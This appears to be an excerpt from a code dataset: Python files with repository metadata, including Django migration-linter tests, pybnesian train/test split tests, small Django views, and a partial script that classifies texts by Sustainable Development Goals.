"RUNPYTHON_MODEL_IMPORT",
"RUNPYTHON_MODEL_VARIABLE_NAME",
],
)
reverse_migration = self.linter.migration_loader.disk_migrations[
("app_data_migrations", "0003_incorrect_arguments")
]
self.linter.lint_migration(reverse_migration)
self.assertEqual(1, self.linter.nb_warnings)
self.assertEqual(0, self.linter.nb_erroneous)
self.assertFalse(self.linter.has_errors)
class DataMigrationModelImportTestCase(unittest.TestCase):
def test_missing_get_model_import(self):
def incorrect_importing_model_forward(apps, schema_editor):
from tests.test_project.app_data_migrations.models import MyModel
MyModel.objects.filter(id=1).first()
issues = MigrationLinter.get_runpython_model_import_issues(
incorrect_importing_model_forward
)
self.assertEqual(1, len(issues))
def test_correct_get_model_import(self):
def correct_importing_model_forward(apps, schema_editor):
MyModel = apps.get_model("app_data_migrations", "MyModel")
MyVeryLongLongLongModel = apps.get_model(
"app_data_migrations", "MyVeryLongLongLongModel"
)
MultiLineModel = apps.get_model(
"app_data_migrations",
"MultiLineModel",
)
MyModel.objects.filter(id=1).first()
MyVeryLongLongLongModel.objects.filter(id=1).first()
MultiLineModel.objects.all()
issues = MigrationLinter.get_runpython_model_import_issues(
correct_importing_model_forward
)
self.assertEqual(0, len(issues))
def test_not_overlapping_model_name(self):
"""
Correct for the import error, but should raise a warning
"""
def forward_method(apps, schema_editor):
User = apps.get_model("auth", "CustomUserModel")
User.objects.filter(id=1).first()
issues = MigrationLinter.get_runpython_model_import_issues(forward_method)
self.assertEqual(0, len(issues))
def test_correct_one_param_get_model_import(self):
def forward_method(apps, schema_editor):
User = apps.get_model("auth.User")
User.objects.filter(id=1).first()
issues = MigrationLinter.get_runpython_model_import_issues(forward_method)
self.assertEqual(0, len(issues))
def test_not_overlapping_one_param(self):
"""
Not an error, but should raise a warning
"""
def forward_method(apps, schema_editor):
User = apps.get_model("auth.CustomUserModel")
User.objects.filter(id=1).first()
issues = MigrationLinter.get_runpython_model_import_issues(forward_method)
self.assertEqual(0, len(issues))
class DataMigrationModelVariableNamingTestCase(unittest.TestCase):
def test_same_variable_name(self):
def forward_op(apps, schema_editor):
MyModel = apps.get_model("app", "MyModel")
MyModel.objects.filter(id=1).first()
issues = MigrationLinter.get_runpython_model_variable_naming_issues(forward_op)
self.assertEqual(0, len(issues))
def test_same_variable_name_multiline(self):
def forward_op(apps, schema_editor):
MyModelVeryLongLongLongLongLong = apps.get_model(
"app", "MyModelVeryLongLongLongLongLong"
)
MyModelVeryLongLongLongLongLong.objects.filter(id=1).first()
issues = MigrationLinter.get_runpython_model_variable_naming_issues(forward_op)
self.assertEqual(0, len(issues))
def test_same_variable_name_multiline2(self):
def forward_op(apps, schema_editor):
MyModelVeryLongLongLongLongLong = apps.get_model(
"app_name_longlonglonglongapp",
"MyModelVeryLongLongLongLongLong",
)
MyModelVeryLongLongLongLongLong.objects.filter(id=1).first()
issues = MigrationLinter.get_runpython_model_variable_naming_issues(forward_op)
self.assertEqual(0, len(issues))
def test_different_variable_name(self):
def forward_op(apps, schema_editor):
some_model = apps.get_model("app", "MyModel")
some_model.objects.filter(id=1).first()
issues = MigrationLinter.get_runpython_model_variable_naming_issues(forward_op)
self.assertEqual(1, len(issues))
def test_diff_variable_name_multiline(self):
def forward_op(apps, schema_editor):
MyModelVeryLongLongLongLongLongNot = apps.get_model(
"app", "MyModelVeryLongLongLongLongLong"
)
MyModelVeryLongLongLongLongLongNot.objects.filter(id=1).first()
issues = MigrationLinter.get_runpython_model_variable_naming_issues(forward_op)
self.assertEqual(1, len(issues))
def test_diff_variable_name_multiline2(self):
def forward_op(apps, schema_editor):
MyModelVeryLongLongLongLongLongNot = apps.get_model(
"app_name_longlonglonglongapp",
"MyModelVeryLongLongLongLongLong",
)
MyModelVeryLongLongLongLongLongNot.objects.filter(id=1).first()
issues = MigrationLinter.get_runpython_model_variable_naming_issues(forward_op)
self.assertEqual(1, len(issues))
def test_same_variable_name_one_param(self):
def forward_op(apps, schema_editor):
MyModel = apps.get_model("app.MyModel")
MyModel.objects.filter(id=1).first()
issues = MigrationLinter.get_runpython_model_variable_naming_issues(forward_op)
self.assertEqual(0, len(issues))
def test_different_variable_name_one_param(self):
def forward_op(apps, schema_editor):
mymodel = apps.get_model("app.MyModel")
mymodel.objects.filter(id=1).first()
issues = MigrationLinter.get_runpython_model_variable_naming_issues(forward_op)
self.assertEqual(1, len(issues))
def test_correct_variable_name_one_param_multiline(self):
def forward_op(apps, schema_editor):
AVeryLongModelName = apps.get_model(
"quite_long_app_name.AVeryLongModelName"
)
AVeryLongModelName.objects.filter(id=1).first()
issues = MigrationLinter.get_runpython_model_variable_naming_issues(forward_op)
self.assertEqual(0, len(issues))
def test_different_variable_name_one_param_multiline(self):
def forward_op(apps, schema_editor):
m = apps.get_model(
"quite_long_app_name_name_name.AVeryLongModelNameNameName"
)
m.objects.filter(id=1).first()
issues = MigrationLinter.get_runpython_model_variable_naming_issues(forward_op)
self.assertEqual(1, len(issues))
class RunSQLMigrationTestCase(unittest.TestCase):
def setUp(self):
test_project_path = os.path.dirname(settings.BASE_DIR)
self.linter = MigrationLinter(
test_project_path,
include_apps=fixtures.DATA_MIGRATIONS,
)
def test_missing_reserve_migration(self):
runsql = migrations.RunSQL("sql;")
error, ignored, warning = self.linter.lint_runsql(runsql)
self.assertEqual("RUNSQL_REVERSIBLE", warning[0]["code"])
def test_sql_linting_error(self):
runsql = migrations.RunSQL("ALTER TABLE t DROP COLUMN t;")
error, ignored, warning = self.linter.lint_runsql(runsql)
self.assertEqual("DROP_COLUMN", error[0]["code"])
def test_sql_linting_error_array(self):
runsql = migrations.RunSQL(
["ALTER TABLE t DROP COLUMN c;", "ALTER TABLE t RENAME COLUMN c;"]
)
error, ignored, warning = self.linter.lint_runsql(runsql)
self.assertEqual("DROP_COLUMN", error[0]["code"])
self.assertEqual("RENAME_COLUMN", error[1]["code"])
def test_sql_linting_error_args(self):
runsql = migrations.RunSQL([("ALTER TABLE %s DROP COLUMN %s;", ("t", "c"))])
error, ignored, warning = self.linter.lint_runsql(runsql)
self.assertEqual("DROP_COLUMN", error[0]["code"])
| 36.509554 | 87 | 0.679606 | 1,248 | 11,464 | 5.922276 | 0.106571 | 0.052767 | 0.032472 | 0.034637 | 0.854553 | 0.818834 | 0.78122 | 0.748613 | 0.731701 | 0.704911 | 0 | 0.008282 | 0.231158 | 11,464 | 313 | 88 | 36.626198 | 0.83027 | 0.008461 | 0 | 0.530702 | 0 | 0 | 0.090901 | 0.042049 | 0 | 0 | 0 | 0 | 0.162281 | 1 | 0.184211 | false | 0 | 0.092105 | 0 | 0.29386 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
54b94c4fc0682e1c71e7b10cec7d1e46aa75d890 | 101 | py | Python | misago/misago/threads/permissions/__init__.py | vascoalramos/misago-deployment | 20226072138403108046c0afad9d99eb4163cedc | [
"MIT"
] | 2 | 2021-03-06T21:06:13.000Z | 2021-03-09T15:05:12.000Z | misago/misago/threads/permissions/__init__.py | vascoalramos/misago-deployment | 20226072138403108046c0afad9d99eb4163cedc | [
"MIT"
] | null | null | null | misago/misago/threads/permissions/__init__.py | vascoalramos/misago-deployment | 20226072138403108046c0afad9d99eb4163cedc | [
"MIT"
] | null | null | null | from .bestanswers import *
from .privatethreads import *
from .threads import *
from .polls import *
| 20.2 | 29 | 0.762376 | 12 | 101 | 6.416667 | 0.5 | 0.38961 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.158416 | 101 | 4 | 30 | 25.25 | 0.905882 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
54bb6ad55bb7a1fa11ec7d6686b1f255b893ea58 | 4,622 | py | Python | tests/dataset/holdout_test.py | vishalbelsare/PyBNesian | 0190cd4cf6d133746741e2750004ccf0a9061fbd | [
"MIT"
] | null | null | null | tests/dataset/holdout_test.py | vishalbelsare/PyBNesian | 0190cd4cf6d133746741e2750004ccf0a9061fbd | [
"MIT"
] | null | null | null | tests/dataset/holdout_test.py | vishalbelsare/PyBNesian | 0190cd4cf6d133746741e2750004ccf0a9061fbd | [
"MIT"
] | null | null | null | import numpy as np
import pandas as pd
import pybnesian as pbn
import util_test
SIZE = 10000
df = util_test.generate_normal_data(SIZE)
def test_holdout_disjoint():
hold = pbn.HoldOut(df)
train_df, test_df = hold.training_data(), hold.test_data()
assert (train_df.num_rows + test_df.num_rows) == SIZE, "HoldOut do not have the expected number of rows"
assert train_df.num_rows == round((1-0.2) * df.shape[0]), "Train DataFrame do not have the expected number of instances"
assert test_df.num_rows == round(0.2 * df.shape[0]), "Test DataFrame do not have the expected number of instances"
combination = pd.concat([train_df.to_pandas(), test_df.to_pandas()])
assert df.sort_values("a", axis=0).reset_index(drop=True)\
.equals(combination.sort_values("a", axis=0).reset_index(drop=True)),\
"The combination of train and test dataset is not equal to the original DataFrame."
hold = pbn.HoldOut(df, test_ratio=0.3)
train_df, test_df = hold.training_data(), hold.test_data()
assert (train_df.num_rows + test_df.num_rows) == SIZE, "HoldOut do not have the expected number of rows"
assert train_df.num_rows == round((1-0.3) * df.shape[0]), "Train DataFrame do not have the expected number of instances"
assert test_df.num_rows == round(0.3 * df.shape[0]), "Test DataFrame do not have the expected number of instances"
combination = pd.concat([train_df.to_pandas(), test_df.to_pandas()])
assert df.sort_values("a", axis=0).reset_index(drop=True)\
.equals(combination.sort_values("a", axis=0).reset_index(drop=True)),\
"The combination of train and test dataset is not equal to the original DataFrame."
def test_holdout_seed():
hold = pbn.HoldOut(df, seed=0)
hold2 = pbn.HoldOut(df, seed=0)
train_df, test_df = hold.training_data(), hold.test_data()
train_df2, test_df2 = hold2.training_data(), hold2.test_data()
assert train_df.equals(train_df2), "Train CV DataFrames with the same seed are not equal."
assert test_df.equals(test_df2), "Test CV DataFrames with the same seed are not equal."
hold3 = pbn.HoldOut(df, seed=1)
train_df3, test_df3 = hold3.training_data(), hold3.test_data()
assert not train_df.equals(train_df3), "Train CV DataFrames with different seeds return the same result."
assert not test_df.equals(test_df3), "Test CV DataFrames with different seeds return the same result."
def test_holdout_null():
np.random.seed(0)
a_null = np.random.randint(0, SIZE, size=100)
b_null = np.random.randint(0, SIZE, size=100)
c_null = np.random.randint(0, SIZE, size=100)
d_null = np.random.randint(0, SIZE, size=100)
df_null = df
df_null.loc[df_null.index[a_null], 'a'] = np.nan
df_null.loc[df_null.index[b_null], 'b'] = np.nan
df_null.loc[df_null.index[c_null], 'c'] = np.nan
df_null.loc[df_null.index[d_null], 'd'] = np.nan
non_null = df_null.dropna()
hold = pbn.HoldOut(df_null)
train_df, test_df = hold.training_data(), hold.test_data()
assert (train_df.num_rows + test_df.num_rows) == non_null.shape[0], "HoldOut do not have the expected number of rows"
assert train_df.num_rows == round((1-0.2) * non_null.shape[0]), "Train DataFrame do not have the expected number of instances"
assert test_df.num_rows == round(0.2 * non_null.shape[0]), "Test DataFrame do not have the expected number of instances"
combination = pd.concat([train_df.to_pandas(), test_df.to_pandas()])
assert combination.sort_values("a", axis=0).reset_index(drop=True)\
.equals(non_null.sort_values("a", axis=0).reset_index(drop=True)),\
"The combination of train and test dataset is not equal to the original DataFrame."
hold_null = pbn.HoldOut(df_null, include_null=True)
train_df, test_df = hold_null.training_data(), hold_null.test_data()
assert (train_df.num_rows + test_df.num_rows) == SIZE, "HoldOut do not have the expected number of rows"
assert train_df.num_rows == round((1-0.2) * SIZE), "Train DataFrame do not have the expected number of instances"
assert test_df.num_rows == round(0.2 * SIZE), "Test DataFrame do not have the expected number of instances"
combination = pd.concat([train_df.to_pandas(), test_df.to_pandas()])
assert combination.sort_values(["a", "b", "c", "d"], axis=0).reset_index(drop=True)\
.equals(df.sort_values(["a", "b", "c", "d"], axis=0).reset_index(drop=True)),\
"The combination of train and test dataset is not equal to the original DataFrame."
| 47.649485 | 130 | 0.694505 | 754 | 4,622 | 4.071618 | 0.111406 | 0.043322 | 0.046906 | 0.046906 | 0.800326 | 0.776222 | 0.765147 | 0.763192 | 0.698371 | 0.641694 | 0 | 0.020053 | 0.180009 | 4,622 | 97 | 131 | 47.649485 | 0.789974 | 0 | 0 | 0.287879 | 1 | 0 | 0.267791 | 0 | 0 | 0 | 0 | 0 | 0.30303 | 1 | 0.045455 | false | 0 | 0.060606 | 0 | 0.106061 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
49b3a47920c87fb1b92137688cc672b47313fd5f | 34 | py | Python | deeplearning/main.py | g2udevelopment/Udacity | 6d706b8d2d3a8b3430b49554f5f49b5a45eee6d3 | [
"MIT"
] | null | null | null | deeplearning/main.py | g2udevelopment/Udacity | 6d706b8d2d3a8b3430b49554f5f49b5a45eee6d3 | [
"MIT"
] | null | null | null | deeplearning/main.py | g2udevelopment/Udacity | 6d706b8d2d3a8b3430b49554f5f49b5a45eee6d3 | [
"MIT"
] | null | null | null | import numpy as np
print("Hello") | 11.333333 | 18 | 0.735294 | 6 | 34 | 4.166667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.147059 | 34 | 3 | 19 | 11.333333 | 0.862069 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0.5 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 6 |
49b9e8871c7dbcee16e6cae9c31f838cf0593a56 | 136 | py | Python | office365/sharepoint/fields/field_url.py | wreiner/Office365-REST-Python-Client | 476bbce4f5928a140b4f5d33475d0ac9b0783530 | [
"MIT"
] | 544 | 2016-08-04T17:10:16.000Z | 2022-03-31T07:17:20.000Z | office365/sharepoint/fields/field_url.py | wreiner/Office365-REST-Python-Client | 476bbce4f5928a140b4f5d33475d0ac9b0783530 | [
"MIT"
] | 438 | 2016-10-11T12:24:22.000Z | 2022-03-31T19:30:35.000Z | office365/sharepoint/fields/field_url.py | wreiner/Office365-REST-Python-Client | 476bbce4f5928a140b4f5d33475d0ac9b0783530 | [
"MIT"
] | 202 | 2016-08-22T19:29:40.000Z | 2022-03-30T20:26:15.000Z | from office365.sharepoint.fields.field import Field
class FieldUrl(Field):
"""Specifies a fields that contains a URL."""
pass
| 19.428571 | 51 | 0.727941 | 18 | 136 | 5.5 | 0.777778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.026786 | 0.176471 | 136 | 6 | 52 | 22.666667 | 0.857143 | 0.286765 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
49cc6da95792f45abbd948a57dd04005d01473c5 | 406 | py | Python | Poetry_AE/views.py | ToBeADevOps/pacp | 870a665773c541a69ab87e94abfc184600a18487 | [
"MIT"
] | null | null | null | Poetry_AE/views.py | ToBeADevOps/pacp | 870a665773c541a69ab87e94abfc184600a18487 | [
"MIT"
] | null | null | null | Poetry_AE/views.py | ToBeADevOps/pacp | 870a665773c541a69ab87e94abfc184600a18487 | [
"MIT"
] | null | null | null | from django.shortcuts import render
def index(request):
return render(request, "index.html")
def About(request):
return render(request, "about.html")
def Sidebar_Left(request):
return render(request, "sidebar-left.html")
def Contact(request):
return render(request, "contact.html")
def Sidebar_Right(request):
return render(request, "sidebar-right.html")
| 18.454545 | 49 | 0.684729 | 49 | 406 | 5.632653 | 0.306122 | 0.235507 | 0.344203 | 0.471014 | 0.23913 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.197044 | 406 | 21 | 50 | 19.333333 | 0.846626 | 0 | 0 | 0 | 0 | 0 | 0.174026 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.454545 | false | 0 | 0.090909 | 0.454545 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
b725747cb86bfce405372a7dcf9cfacab5911af7 | 260 | py | Python | chapter09/example06.py | YordanIH/Intro_to_CS_w_Python | eebbb8efd7ef0d07be9bc45b6b1e8f20737ce01a | [
"MIT"
] | null | null | null | chapter09/example06.py | YordanIH/Intro_to_CS_w_Python | eebbb8efd7ef0d07be9bc45b6b1e8f20737ce01a | [
"MIT"
] | null | null | null | chapter09/example06.py | YordanIH/Intro_to_CS_w_Python | eebbb8efd7ef0d07be9bc45b6b1e8f20737ce01a | [
"MIT"
] | null | null | null | #Using the function range, setting the step size
print(list(range(1,5)))
print(list(range(1,10)))
print(list(range(5,10)))
print(list(range(2000, 2050, 4)))
print(list(range(2500, 2000, -4)))
print(list(range(2000, 2050, -4)))
print(list(range(2050, 2000, 4))) | 32.5 | 48 | 0.696154 | 47 | 260 | 3.851064 | 0.340426 | 0.348066 | 0.541436 | 0.248619 | 0.40884 | 0.40884 | 0.40884 | 0.40884 | 0.40884 | 0 | 0 | 0.184874 | 0.084615 | 260 | 8 | 49 | 32.5 | 0.57563 | 0.180769 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
b72b6414128d7532285b9517574b04d22a6d2a53 | 91 | py | Python | saefportal/restapi/views/__init__.py | harry-consulting/SAEF1 | 055d6e492ba76f90e3248b9da2985fdfe0c6b430 | [
"BSD-2-Clause"
] | null | null | null | saefportal/restapi/views/__init__.py | harry-consulting/SAEF1 | 055d6e492ba76f90e3248b9da2985fdfe0c6b430 | [
"BSD-2-Clause"
] | null | null | null | saefportal/restapi/views/__init__.py | harry-consulting/SAEF1 | 055d6e492ba76f90e3248b9da2985fdfe0c6b430 | [
"BSD-2-Clause"
] | 1 | 2020-12-16T15:02:52.000Z | 2020-12-16T15:02:52.000Z | from .root_view import *
from .list_retrieve_views import *
from .procedure_views import *
| 22.75 | 34 | 0.802198 | 13 | 91 | 5.307692 | 0.615385 | 0.289855 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.131868 | 91 | 3 | 35 | 30.333333 | 0.873418 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
b778e43a7e9b8bbdf12b9209a4906e1acf682742 | 200 | py | Python | server/contests/status/resolvers.py | jauhararifin/ugrade | c5bc0ce3920534cf289c739ffe8b83ceed9f52e8 | [
"MIT"
] | 15 | 2019-02-27T19:28:23.000Z | 2019-07-20T17:54:46.000Z | server/contests/status/resolvers.py | jauhararifin/ugrade | c5bc0ce3920534cf289c739ffe8b83ceed9f52e8 | [
"MIT"
] | 9 | 2020-09-04T18:30:56.000Z | 2022-03-25T18:41:11.000Z | server/contests/status/resolvers.py | jauhararifin/ugrade | c5bc0ce3920534cf289c739ffe8b83ceed9f52e8 | [
"MIT"
] | 2 | 2019-03-29T14:15:47.000Z | 2019-04-12T06:08:11.000Z | import datetime
from django.utils import timezone
def ping_resolver(_root, _info) -> str:
return 'pong'
def server_clock_resolver(_root, _info) -> datetime.datetime:
return timezone.now()
| 18.181818 | 61 | 0.745 | 26 | 200 | 5.461538 | 0.653846 | 0.169014 | 0.225352 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.16 | 200 | 10 | 62 | 20 | 0.845238 | 0 | 0 | 0 | 0 | 0 | 0.02 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
b7c54502f926c588c0a895b338f87e9acce47bdf | 127 | py | Python | mobie/htm/__init__.py | platybrowser/mmb-core | d48e9b4781de479ad19e1523630e310575a2fd84 | [
"MIT"
] | 1 | 2020-03-03T01:33:06.000Z | 2020-03-03T01:33:06.000Z | mobie/htm/__init__.py | platybrowser/mmb-core | d48e9b4781de479ad19e1523630e310575a2fd84 | [
"MIT"
] | 4 | 2020-05-15T09:27:59.000Z | 2020-05-29T19:15:00.000Z | mobie/htm/__init__.py | platybrowser/mmb-core | d48e9b4781de479ad19e1523630e310575a2fd84 | [
"MIT"
] | 2 | 2020-06-08T07:06:01.000Z | 2020-06-08T07:08:08.000Z | from .data_import import add_images, add_segmentations
from .grid_views import add_plate_grid_view, get_merged_plate_grid_view
| 42.333333 | 71 | 0.889764 | 21 | 127 | 4.857143 | 0.571429 | 0.176471 | 0.254902 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.07874 | 127 | 2 | 72 | 63.5 | 0.871795 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
b7f5c520d9c9b3c85fdb382a08456fdc98508327 | 19,207 | py | Python | Lenguaje natural/text_ods_token.py | DubanTorres/Analisis-Scrapping-Convocatorias-Clacso | 0a4f397a3e5275973bb627f2f85eac76fb53030a | [
"BSD-3-Clause"
] | null | null | null | Lenguaje natural/text_ods_token.py | DubanTorres/Analisis-Scrapping-Convocatorias-Clacso | 0a4f397a3e5275973bb627f2f85eac76fb53030a | [
"BSD-3-Clause"
] | null | null | null | Lenguaje natural/text_ods_token.py | DubanTorres/Analisis-Scrapping-Convocatorias-Clacso | 0a4f397a3e5275973bb627f2f85eac76fb53030a | [
"BSD-3-Clause"
] | 1 | 2021-10-04T14:28:40.000Z | 2021-10-04T14:28:40.000Z | import pandas as pd
import os
"""
Prepara Archivos
"""
textos = os.listdir('/home/duban/Workspace/Analisis-Scrapping-Convocatorias-Clacso/data/2. Textos Geneales')
bdd = pd.read_csv('/home/duban/Workspace/Analisis-Scrapping-Convocatorias-Clacso/data/Latam3.csv')
bdd = bdd.loc[bdd['Tipo convocatoria'] == 'Investigación-Innovación']
"""
Tokens español
"""
gramas_esp = pd.read_csv('/home/duban/Workspace/Analisis-Scrapping-Convocatorias-Clacso/data/Gramas_final.csv')
# Convierte ods en lista
class_ods_esp = []
for list_osd in gramas_esp['ODS']:
list_osd = list_osd.lower().replace(':', ';').split(';')
list_osd2 = []
for o in list_osd:
if o == 'rabajo decente y crecimiento económico' or o == 'trabajo decente y crecimiento económico' or o == 'trabajo decente y crecimiento económic':
o = 'trabajo decente y crecimiento económico'
if o == 'igualdad de género' or o == 'gualdad de género' or o == 'igualdad de genero':
o = 'igualdad de género'
if o == 'industria, innovación e infraestructuras' or o == 'industria, innovación e infraestructura':
o = 'industria, innovación e infraestructuras'
if o == 'paz, justicia e instituciones solidas' or o == 'paz, justicia e instituciones sólidas' or o == 'paz, justicia e instituciones sólida':
o = 'paz, justicia e instituciones sólidas'
if 'producción y consumo' in o:
o = 'producción y consumo responsable'
if o == 'ciudades y comunidades sostenibles' or o == 'ciudades y comunidades sostenible' or o == 'ciudades y comunidades sostenible':
o = 'ciudades y comunidades sostenibles'
if o == 'alianzas para lograr los objetivos' or o == 'alianza para lograr los objetivos':
o = 'alianza para lograr los objetivos'
if o == 'reducción de desigualdade' or o == 'reducción de las desigualdades' or o == 'reducción de desigualdades':
o = 'reducción de desigualdades'
if o == 'vida de ecosistemas terrestres' or o == 'vida de ecosistemas terrestre':
o = 'vida de ecosistemas terrestres'
o = o.strip()
list_osd2.append(o)
class_ods_esp.append(list_osd2)
gramas_esp['ODS'] = class_ods_esp
"""
Tokens portugues
"""
gramas_por = pd.read_csv('/home/duban/Workspace/Analisis-Scrapping-Convocatorias-Clacso/data/Gramas_protugues.csv')
# convierte Ods en lista
class_ods_por = []
for list_osd in gramas_por['ODS']:
list_osd = list_osd.lower().split(';')
list_osd2 = []
for o in list_osd:
if o == 'rabajo decente y crecimiento económico' or o == 'trabajo decente y crecimiento económico' or o == 'trabajo decente y crecimiento económic':
o = 'trabajo decente y crecimiento económico'
if o == 'igualdad de género' or o == 'gualdad de género' or o == 'igualdad de genero':
o = 'igualdad de género'
if o == 'industria, innovación e infraestructuras' or o == 'industria, innovación e infraestructura':
o = 'industria, innovación e infraestructuras'
if o == 'paz, justicia e instituciones solidas' or o == 'paz, justicia e instituciones sólidas' or o == 'paz, justicia e instituciones sólida':
o = 'paz, justicia e instituciones sólidas'
if 'producción y consumo' in o:
o = 'producción y consumo responsable'
if o == 'ciudades y comunidades sostenibles' or o == 'ciudades y comunidades sostenible' or o == 'ciudades y comunidades sostenible':
o = 'ciudades y comunidades sostenibles'
if o == 'alianzas para lograr los objetivos' or o == 'alianza para lograr los objetivos':
o = 'alianza para lograr los objetivos'
if o == 'reducción de desigualdade' or o == 'reducción de las desigualdades' or o == 'reducción de desigualdades':
o = 'reducción de desigualdades'
if o == 'vida de ecosistemas terrestres' or o == 'vida de ecosistemas terrestre':
o = 'vida de ecosistemas terrestres'
o = o.strip()
list_osd2.append(o.lower())
class_ods_por.append(list_osd2)
gramas_por['ODS'] = class_ods_por
"""
Elimina las tildes
"""
def normalize(s):
replacements = (
("á", "a"),
("é", "e"),
("í", "i"),
("ó", "o"),
("ú", "u"),
("Á", "A"),
("É", "E"),
("Í", "I"),
("Ó", "O"),
("Ú", "U")
)
for a, b in replacements:
s = s.replace(a, b)
return s
"""
Crea matriz de tokens en textos
"""
txt_inv = bdd['ID Proyecto'].tolist()
entidad = bdd['País'].tolist()
entidad.index('Brasil')
gramas_esp = gramas_esp[gramas_esp['ODS'].isnull() == False]
path_base = '/home/duban/Workspace/Analisis-Scrapping-Convocatorias-Clacso/data/2. Textos Geneales'
# matriz = pd.read_csv('/home/duban/Workspace/Analisis-Scrapping-Convocatorias-Clacso/data/Matriz_Clasificación_ODS.csv')
matriz = pd.DataFrame()
n = 0
for i in txt_inv:
n+=1
print(str(n * 100 / len(txt_inv)))
print(n)
txt = open(path_base + '/' + i , 'r')
txt = str(normalize(txt.read())).replace('\n', ' ').split('.')
## Va Palabra por palabra
"""
Define variables por ODS
"""
pobreza = ''
pobreza_num= 0
hambre = ''
hambre_num = 0
salud = ''
salud_num = 0
educacion = ''
educacion_num = 0
genero = ''
genero_num = 0
agua = ''
agua_num = 0
energia = ''
energia_num = 0
trabajo = ''
trabajo_num = 0
industria = ''
industria_num = 0
desigualdades = ''
desigualdades_num = 0
sostenibles = ''
sostenibles_num = 0
producción_consumo = ''
producción_consumo_num = 0
clima = ''
clima_num = 0
submarina = ''
submarina_num = 0
terrestres = ''
terrestres_num = 0
paz = ''
paz_num = 0
alianza = ''
alianza_num = 0
if entidad[txt_inv.index(i)] != 'Brasil':
for t in range(len(txt)):
i_split = txt[t].split()
for grama in i_split:
grama = str(grama).lower()
if grama in gramas_esp['Gramas'].tolist() and grama.isalpha() and grama.isdigit() == False:
for id_token in range(len(gramas_esp)):
if grama == gramas_esp['Gramas'][id_token]:
